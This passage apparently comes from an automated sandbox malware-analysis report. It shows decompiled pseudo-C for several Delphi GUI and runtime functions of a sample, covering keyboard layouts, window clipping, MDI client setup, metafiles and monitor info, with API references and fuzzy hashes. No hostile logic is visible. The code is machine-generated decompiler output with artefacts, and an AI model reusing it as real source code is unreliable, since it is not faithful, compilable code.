                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                          • String ID:
                          • API String ID: 3024527889-0
                          • Opcode ID: b83bdb32dfeaee1045fa02d8ee2b6da0c8490619bc3cad7d5b61e2f0d7f65c9b
                          • Instruction ID: 7902b9319f6804c99918e6c0ea148b17f761cf9ad30a9150b37da86ad90e8a16
                          • Opcode Fuzzy Hash: b83bdb32dfeaee1045fa02d8ee2b6da0c8490619bc3cad7d5b61e2f0d7f65c9b
                          • Instruction Fuzzy Hash: DD511A7CA00209EFDB11EFA8C585B9EB7F6AF08304F6045A0E544EB295D775AE40DF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281BDF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 129registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E0281BDF0(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v20;
				int _v24;
				void* _v28;
				char _v32;
				struct HKL__* _v288;
				char _v544;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				void* _t78;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t135;
				void* _t136;
				intOrPtr _t137;
				void* _t147;

				_t147 = __fp0;
				_t135 = _t136;
				_t137 = _t136 + 0xfffffd98;
				_v620 = 0;
				_v8 = __eax;
				_push(_t135);
				_push(0x281bfbb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t137;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_v12 =  *((intOrPtr*)(_v8 + 0x34));
					_pop(_t124);
					 *[fs:eax] = _t124;
					_push(0x281bfc2);
					return E027D40E8( &_v620);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E027D31DC(1);
					E027D40E8(_v8 + 0x38);
					_v16 = GetKeyboardLayoutList(0x40,  &_v288);
					_t78 = _v16 - 1;
					if(_t78 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E027ED854( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v32 = _t78 + 1;
						_v20 = 0;
						do {
							if(E02838BE4( *((intOrPtr*)(_t135 + _v20 * 4 - 0x11c))) == 0) {
								goto L9;
							} else {
								_v616 =  *((intOrPtr*)(_t135 + _v20 * 4 - 0x11c));
								_v612 = 0;
								if(RegOpenKeyExA(0x80000002, E027D91E4( &_v608,  &_v616, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t147, 0), 0, 0x20019,  &_v28) != 0) {
									goto L9;
								} else {
									_push(_t135);
									_push(0x281bf6f);
									_push( *[fs:eax]);
									 *[fs:eax] = _t137;
									_v24 = 0x100;
									if(RegQueryValueExA(_v28, "layout text", 0, 0,  &_v544,  &_v24) == 0) {
										E027D4358( &_v620, 0x100,  &_v544);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *((intOrPtr*)(_t135 + _v20 * 4 - 0x11c)) ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E027D4358(_v8 + 0x38, 0x100,  &_v544);
										}
									}
									_pop(_t129);
									 *[fs:eax] = _t129;
									_push(0x281bf76);
									return RegCloseKey(_v28);
								}
							}
							goto L12;
							L9:
							_v20 = _v20 + 1;
							_t51 =  &_v32;
							 *_t51 = _v32 - 1;
						} while ( *_t51 != 0);
						goto L10;
					}
				}
				L12:
			}























                          0x0281bdf0
                          0x0281bdf1
                          0x0281bdf3
                          0x0281bdfc
                          0x0281be02
                          0x0281be07
                          0x0281be08
                          0x0281be0d
                          0x0281be10
                          0x0281be1a
                          0x0281bf99
                          0x0281bf9f
                          0x0281bfa4
                          0x0281bfa7
                          0x0281bfaa
                          0x0281bfba
                          0x0281be20
                          0x0281be2f
                          0x0281be38
                          0x0281be4b
                          0x0281be51
                          0x0281be54
                          0x0281bf82
                          0x0281bf88
                          0x0281bf94
                          0x00000000
                          0x0281be5a
                          0x0281be5b
                          0x0281be5e
                          0x0281be65
                          0x0281be76
                          0x00000000
                          0x0281be7c
                          0x0281be93
                          0x0281be99
                          0x0281bec3
                          0x00000000
                          0x0281bec9
                          0x0281becb
                          0x0281becc
                          0x0281bed1
                          0x0281bed4
                          0x0281bed7
                          0x0281befd
                          0x0281bf10
                          0x0281bf2d
                          0x0281bf40
                          0x0281bf53
                          0x0281bf53
                          0x0281bf40
                          0x0281bf5a
                          0x0281bf5d
                          0x0281bf60
                          0x0281bf6e
                          0x0281bf6e
                          0x0281bec3
                          0x00000000
                          0x0281bf76
                          0x0281bf76
                          0x0281bf79
                          0x0281bf79
                          0x0281bf79
                          0x00000000
                          0x0281be65
                          0x0281be54
                          0x00000000

                          APIs
                          • GetKeyboardLayoutList.USER32(00000040,?,?,?,?,?,?,?,?,?,00000000,0281BFBB,?,?,?,0281C024), ref: 0281BE46
                          • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 0281BEBC
                          • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,?,00000000,0281BF6F,?,80000002,00000000), ref: 0281BEF6
                          • RegCloseKey.ADVAPI32(?,0281BF76,00000000,?,?,00000000,0281BF6F,?,80000002,00000000), ref: 0281BF69
                          Strings
                          • layout text, xrefs: 0281BEED
                          • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0281BEA6
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CloseKeyboardLayoutListOpenQueryValue
                          • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                          • API String ID: 1703357764-2652665750
                          • Opcode ID: 497a1b5d73bc6f7646845c49dd53b7856febeed75787d5bd5f7aa2980b61dbcb
                          • Instruction ID: 6820764ff0809ff3c73f12bb0c2d0c069bd8c3ab9fc30f7eeca490056993d27f
                          • Opcode Fuzzy Hash: 497a1b5d73bc6f7646845c49dd53b7856febeed75787d5bd5f7aa2980b61dbcb
                          • Instruction Fuzzy Hash: A5513778A042199FDB11DF98D885BEDB7B9EB08304F5144A1E908E7790D775AE41CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028606AC Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E028606AC(intOrPtr __eax, void* __ebx, void* __ecx, struct HDC__* __edx, void* __edi, void* __eflags) {
				intOrPtr _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HDC__* _t127;
				void* _t128;
				intOrPtr _t142;
				void* _t147;
				void* _t149;

				_t149 = __eflags;
				_t128 = __ecx;
				_t127 = __edx;
				_v8 = __eax;
				GetClientRect(E02833F7C(_v8),  &_v24);
				GetWindowRect(E02833F7C(_v8),  &_v40);
				MapWindowPoints(0, E02833F7C(_v8),  &_v40, 2);
				OffsetRect( &_v24,  ~(_v40.left),  ~(_v40.top));
				ExcludeClipRect(_t127, _v24, _v24.top, _v24.right, _v24.bottom);
				OffsetRect( &_v40,  ~(_v40.left),  ~(_v40.top));
				_push(_t147);
				_push(0x2860829);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147 + 0xffffffdc;
				E027F856C( *((intOrPtr*)(_v8 + 0x21c)), _t127);
				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t128,  *((intOrPtr*)(E02855D3C(_v8, _t149) + 0x7c)), __edi, _t147);
				E027F7CA4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x14)), _t128,  *((intOrPtr*)(E02855D3C(_v8, _t149) + 0x40)), __edi, _t147, _t149);
				E027F8294( &_v40);
				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t128,  *((intOrPtr*)(E02855D3C(_v8, _t149) + 0x34)), __edi, _t147);
				E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), 1, 1);
				E027F8150( *((intOrPtr*)(_v8 + 0x21c)),  *((intOrPtr*)(_v8 + 0x4c)) - 1, 1);
				_pop(_t142);
				 *[fs:eax] = _t142;
				_push(0x2860830);
				IntersectClipRect(E027F84EC( *((intOrPtr*)(_v8 + 0x21c))), _v40, _v40.top, _v40.right, _v40.bottom);
				return E027F856C( *((intOrPtr*)(_v8 + 0x21c)), 0);
			}











                          0x028606ac
                          0x028606ac
                          0x028606b3
                          0x028606b5
                          0x028606c5
                          0x028606d7
                          0x028606ed
                          0x02860702
                          0x02860718
                          0x0286072d
                          0x02860734
                          0x02860735
                          0x0286073a
                          0x0286073d
                          0x0286074b
                          0x02860767
                          0x02860783
                          0x02860794
                          0x028607b0
                          0x028607c8
                          0x028607e2
                          0x028607e9
                          0x028607ec
                          0x028607ef
                          0x02860813
                          0x02860828

                          APIs
                          • GetClientRect.USER32(00000000,?), ref: 028606C5
                          • GetWindowRect.USER32(00000000,?), ref: 028606D7
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 028606ED
                          • OffsetRect.USER32(?,?,?), ref: 02860702
                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 02860718
                          • OffsetRect.USER32(?,?,?), ref: 0286072D
                            • Part of subcall function 027F81B0: MoveToEx.GDI32(00000000,?,?,00000000), ref: 027F81CE
                            • Part of subcall function 027F8150: LineTo.GDI32(?), ref: 027F8173
                          • IntersectClipRect.GDI32(00000000,?,?,?,?), ref: 02860813
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$ClipOffsetWindow$ClientExcludeIntersectLineMovePoints
                          • String ID:
                          • API String ID: 2350720055-0
                          • Opcode ID: 0c7f37bd23645d79e7cc7b158d29e77166a999e02659c420c982e54a16b39c2d
                          • Instruction ID: 57d8409b0254892770e6d6fa05d4a5e772925f28baf1f1c165a936cd42cdcaba
                          • Opcode Fuzzy Hash: 0c7f37bd23645d79e7cc7b158d29e77166a999e02659c420c982e54a16b39c2d
                          • Instruction Fuzzy Hash: E6418279A44108AFDB41EBA8D989EEEB7F9AF0C300F6144A1E905E7351C735EE019F61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02817FA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02817FA0(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char* _t42;
				intOrPtr _t43;
				void* _t46;
				void* _t50;
				void* _t52;
				void* _t54;
				intOrPtr _t55;
				void* _t72;
				long _t81;

				_v8 = __eax;
				E028148C4(_v8);
				_t42 =  *0x28644d4; // 0x2865b98
				if( *_t42 != 0) {
					if( *((char*)(_v8 + 0x229)) == 3) {
						SendMessageA(E02833F7C(_v8), 0x80, 1, 0);
					} else {
						_t81 = E02818B60(_v8);
						SendMessageA(E02833F7C(_v8), 0x80, 1, _t81);
					}
				}
				_t43 = _v8;
				if(( *(_t43 + 0x1c) & 0x00000010) != 0) {
					return _t43;
				} else {
					_t46 =  *((intOrPtr*)(_v8 + 0x22f)) - 2;
					if(_t46 == 0) {
						_v12 = 0xff00;
						_v16 = 0;
						if( *((intOrPtr*)(_v8 + 0x258)) != 0) {
							_v16 = E028238BC( *((intOrPtr*)(_v8 + 0x258)));
						}
						_t50 = E0282D154(_v8);
						_t52 = E0282D198(_v8);
						_t54 = E02833F7C(_v8);
						_t55 =  *0x2865668; // 0x27d0000
						 *(_v8 + 0x254) = E027D6FCC(0x200, "MDICLIENT",  &_v16, _t55, 0, _t54, _t52, _t50, 0, 0, 0x56330001);
						 *(_v8 + 0x278) = E027F48F8(E028169E4, _v8);
						 *((intOrPtr*)(_v8 + 0x274)) = GetWindowLongA( *(_v8 + 0x254), 0xfffffffc);
						return SetWindowLongA( *(_v8 + 0x254), 0xfffffffc,  *(_v8 + 0x278));
					}
					_t72 = _t46 - 1;
					if(_t72 == 0) {
						return SetWindowPos(E02833F7C(_v8), 0xffffffff, 0, 0, 0, 0, 0x13);
					}
					return _t72;
				}
			}















                          0x02817fa6
                          0x02817fac
                          0x02817fb1
                          0x02817fb9
                          0x02817fc5
                          0x02817ff9
                          0x02817fc7
                          0x02817fca
                          0x02817fe0
                          0x02817fe0
                          0x02817fc5
                          0x02817ffe
                          0x02818005
                          0x02818103
                          0x0281800b
                          0x02818014
                          0x02818016
                          0x02818025
                          0x0281802e
                          0x0281803b
                          0x0281804b
                          0x0281804b
                          0x0281805a
                          0x02818063
                          0x0281806c
                          0x02818074
                          0x02818092
                          0x028180a9
                          0x028180c3
                          0x00000000
                          0x028180df
                          0x02818018
                          0x0281801a
                          0x00000000
                          0x028180fb
                          0x00000000
                          0x0281801a

                          APIs
                          • SendMessageA.USER32(00000000,00000080,00000001,00000000), ref: 02817FE0
                          • SendMessageA.USER32(00000000,00000080,00000001,00000000), ref: 02817FF9
                          • GetWindowLongA.USER32(?,000000FC), ref: 028180BB
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 028180DF
                          • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 028180FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$LongMessageSend
                          • String ID: MDICLIENT
                          • API String ID: 642794312-871263795
                          • Opcode ID: e76eeb068c0ef5b3a04a0bce8274277abcdf86ed168fa633ede5f82950e3b595
                          • Instruction ID: 709ca999b5c0ff1b7ba24054d9d8c24e142d6e024597d4db2a21fb2a18395e66
                          • Opcode Fuzzy Hash: e76eeb068c0ef5b3a04a0bce8274277abcdf86ed168fa633ede5f82950e3b595
                          • Instruction Fuzzy Hash: F9411278A44148FFEB51EBA8CD4AF9DB7F9AB04700F2441A0B514EB2D1C775AE44DB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FB26C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E027FB26C(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t78;
				void* _t81;
				void* _t84;
				void* _t86;
				intOrPtr _t87;

				_t84 = _t86;
				_t87 = _t86 + 0xffffffdc;
				_t81 = __edx;
				_t66 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E027D2C20( &_v38, 0x16);
					_t68 =  *((intOrPtr*)(_t66 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t68 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_v18 = E027F962C( &_v38);
					_v16 = GetDC(0);
					_push(_t84);
					_push(0x27fb3a7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
					_v8 = E027D277C(_v12);
					_push(_t84);
					_push(0x27fb387);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
						E027F883C(_t68);
					}
					E027EDB68(_t81, 0x16,  &_v38);
					E027EDB68(_t81, _v12, _v8);
					_pop(_t78);
					 *[fs:eax] = _t78;
					_push(0x27fb38e);
					return E027D279C(_v8);
				}
			}





















                          0x027fb26d
                          0x027fb26f
                          0x027fb274
                          0x027fb276
                          0x027fb27c
                          0x027fb3b3
                          0x027fb282
                          0x027fb28c
                          0x027fb291
                          0x027fb294
                          0x027fb29b
                          0x027fb2a2
                          0x027fb2ac
                          0x027fb2a4
                          0x027fb2a4
                          0x027fb2a4
                          0x027fb2c3
                          0x027fb2da
                          0x027fb2e6
                          0x027fb2f1
                          0x027fb2f6
                          0x027fb2f7
                          0x027fb2fc
                          0x027fb2ff
                          0x027fb315
                          0x027fb320
                          0x027fb325
                          0x027fb326
                          0x027fb32b
                          0x027fb32e
                          0x027fb34b
                          0x027fb34d
                          0x027fb34d
                          0x027fb35c
                          0x027fb369
                          0x027fb370
                          0x027fb373
                          0x027fb376
                          0x027fb386
                          0x027fb386

                          APIs
                          • MulDiv.KERNEL32(?,?,000009EC), ref: 027FB2BE
                          • MulDiv.KERNEL32(?,?,000009EC), ref: 027FB2D5
                          • GetDC.USER32(00000000), ref: 027FB2EC
                          • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,027FB3A7,?,00000000,?,?,000009EC,?,?,000009EC), ref: 027FB310
                          • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,027FB387,?,?,00000000,00000000,00000008,?,00000000,027FB3A7), ref: 027FB343
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: BitsFileMeta
                          • String ID: `
                          • API String ID: 858000408-2679148245
                          • Opcode ID: 9e65907d3ef0bc4d19bff0ce90291ea4565f878e7e576613bf34e9e3f1b4a4e8
                          • Instruction ID: 34befc2050ca2970819c7fbfcf90e23b2dd1d3c8d9883b7a716dd61dda4ea286
                          • Opcode Fuzzy Hash: 9e65907d3ef0bc4d19bff0ce90291ea4565f878e7e576613bf34e9e3f1b4a4e8
                          • Instruction Fuzzy Hash: A4314075A44208ABDF41EFE8D885AAEB7BDEF0C710F504495EA04EB341D735AE00DBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02821810 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 56%
                          			E02821810(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x2865b7c == 0) {
					 *0x2865b7c = E027DC45C("comctl32.dll", __eax);
					if( *0x2865b7c >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x2865b80 = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E027F4360(_t43, 1, 0);
				_push(_t45);
				_push(0x282190a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x2865b80 == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E028203AC(_t28);
					_push(_t11);
					L027FEF64();
					if(_t11 == 0) {
						_t33 =  *0x2864488; // 0x27f53cc
						E027DBC80(_t33, 1);
						E027D3A9C();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E028203AC(_t28));
					if( *0x2865b80() != 0) {
						_t34 =  *0x2864488; // 0x27f53cc
						E027DBC80(_t34, 1);
						E027D3A9C();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x2821911);
				return E027D320C(_v8);
			}
















                          0x02821811
                          0x02821814
                          0x02821817
                          0x02821819
                          0x02821822
                          0x0282182e
                          0x0282183d
                          0x02821849
                          0x0282184d
                          0x0282185a
                          0x0282185a
                          0x0282184d
                          0x0282183d
                          0x0282186f
                          0x02821874
                          0x02821875
                          0x0282187a
                          0x0282187d
                          0x02821887
                          0x028218c1
                          0x028218c6
                          0x028218c8
                          0x028218c8
                          0x028218cb
                          0x028218ce
                          0x028218d3
                          0x028218d4
                          0x028218db
                          0x028218dd
                          0x028218ea
                          0x028218ef
                          0x028218ef
                          0x02821889
                          0x02821889
                          0x0282188e
                          0x02821890
                          0x02821890
                          0x02821893
                          0x02821894
                          0x0282189d
                          0x028218a6
                          0x028218a8
                          0x028218b5
                          0x028218ba
                          0x028218ba
                          0x028218a6
                          0x028218f6
                          0x028218f9
                          0x028218fc
                          0x02821909

                          APIs
                            • Part of subcall function 027DC45C: 74771510.VERSION(00000000,?,00000000,027DC532), ref: 027DC49E
                            • Part of subcall function 027DC45C: 747714F0.VERSION(00000000,?,00000000,?,00000000,027DC515,?,00000000,?,00000000,027DC532), ref: 027DC4D3
                            • Part of subcall function 027DC45C: 74771530.VERSION(?,027DC544,?,?,00000000,?,00000000,?,00000000,027DC515,?,00000000,?,00000000,027DC532), ref: 027DC4ED
                          • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 02821844
                          • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 02821855
                          • 74470EC0.COMCTL32(00000000,?,00000000,0282190A), ref: 028218D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: 744707477147477151074771530AddressHandleModuleProc
                          • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                          • API String ID: 3941436784-3125200627
                          • Opcode ID: 285fe3251db0d309f749525e7169e3bcae2ca31ee4bb78b6d4a2a26704a4d8e9
                          • Instruction ID: 080efacf234b7bc223d80158ffa2e4419f31e8458854c28a15de577cce35a4bb
                          • Opcode Fuzzy Hash: 285fe3251db0d309f749525e7169e3bcae2ca31ee4bb78b6d4a2a26704a4d8e9
                          • Instruction Fuzzy Hash: C021D67CB40215AFD711EB78DC8CB2A37AEEB44714F911428E809DB292DB34D898CF21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F4FD8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 47%
                          			E027F4FD8(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x28658bd != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L027D675C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x28658a4; // 0x27f4fd8
					 *0x28658a4 = E027F4BD4(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x28658a4(_t27, _t29);
				}
				return _t24;
			}














                          0x027f4fe1
                          0x027f4fe4
                          0x027f4fee
                          0x027f5013
                          0x027f501b
                          0x027f503b
                          0x027f5040
                          0x027f504b
                          0x027f5056
                          0x027f5060
                          0x027f5061
                          0x027f5062
                          0x027f5063
                          0x027f5064
                          0x027f5065
                          0x027f506f
                          0x027f5071
                          0x027f5079
                          0x027f507a
                          0x027f507a
                          0x027f507f
                          0x027f507f
                          0x027f4ff0
                          0x027f4ff5
                          0x027f5002
                          0x027f500f
                          0x027f500f
                          0x027f5089

                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 027F5030
                          • GetSystemMetrics.USER32(00000000), ref: 027F5045
                          • GetSystemMetrics.USER32(00000001), ref: 027F5050
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 027F507A
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfoA
                          • API String ID: 2545840971-1370492664
                          • Opcode ID: e3174c3286056ce36f9de14a6ce09518dc650fff4a102279b3e68c2c80d17bde
                          • Instruction ID: bd4e2d6bf95c061b22ef18f1f0c231f168da8d86bc2ef5879bc029ab0850a11c
                          • Opcode Fuzzy Hash: e3174c3286056ce36f9de14a6ce09518dc650fff4a102279b3e68c2c80d17bde
                          • Instruction Fuzzy Hash: A011AC35A457049FDB60DE74D848BA7B7E9FF05311F800929EE599BB80D7B0A445CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F50AC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 47%
                          			E027F50AC(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x28658be != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L027D675C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x28658a8; // 0x27f50ac
					 *0x28658a8 = E027F4BD4(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x28658a8(_t27, _t29);
				}
				return _t24;
			}














                          0x027f50b5
